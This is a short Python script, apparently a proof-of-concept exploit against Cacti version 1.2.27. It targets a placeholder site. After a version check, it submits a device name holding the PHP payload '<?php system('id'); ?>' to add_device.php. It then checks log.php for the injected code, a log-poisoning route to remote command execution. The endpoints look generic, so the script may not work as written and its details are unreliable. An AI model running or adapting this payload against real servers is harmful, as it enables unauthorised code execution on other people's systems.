import requests

url = "http://target-cacti-site.com/cacti"

def check_version(url):
    try:
        response = requests.get(url + "/version.php")
        if response.status_code == 200 and "1.2.27" in response.text:
            print("[!] The site is running a vulnerable version of Cacti.")
        else:
            print("[*] The site might not be vulnerable or it is updated to a secure version.")
    except Exception as e:
        print(f"[!] Error connecting to the site: {e}")

def create_malicious_device(url, session, token):
    device_name = "<?php system('id'); ?>"
    data = {
        "device_name": device_name,
        "token": token
    }
    try:
        response = session.post(url + "/add_device.php", data=data)
        if response.status_code == 200:
            print("[!] Malicious device created successfully.")
        else:
            print("[!] Failed to create malicious device.")
    except Exception as e:
        print(f"[!] Error creating device: {e}")

def check_log_poisoning(url, session):
    try:
        log_url = url + "/log.php"
        response = session.get(log_url)
        if "<?php" in response.text:
            print("[!] Potential malicious code detected in the logs.")
        else:
            print("[*] No malicious code found in the logs.")
    except Exception as e:
        print(f"[!] Error accessing logs: {e}")

def main():
    session = requests.Session()
    check_version(url)
    token = "your_token_here"
    create_malicious_device(url, session, token)
    check_log_poisoning(url, session)

if __name__ == "__main__":
    main()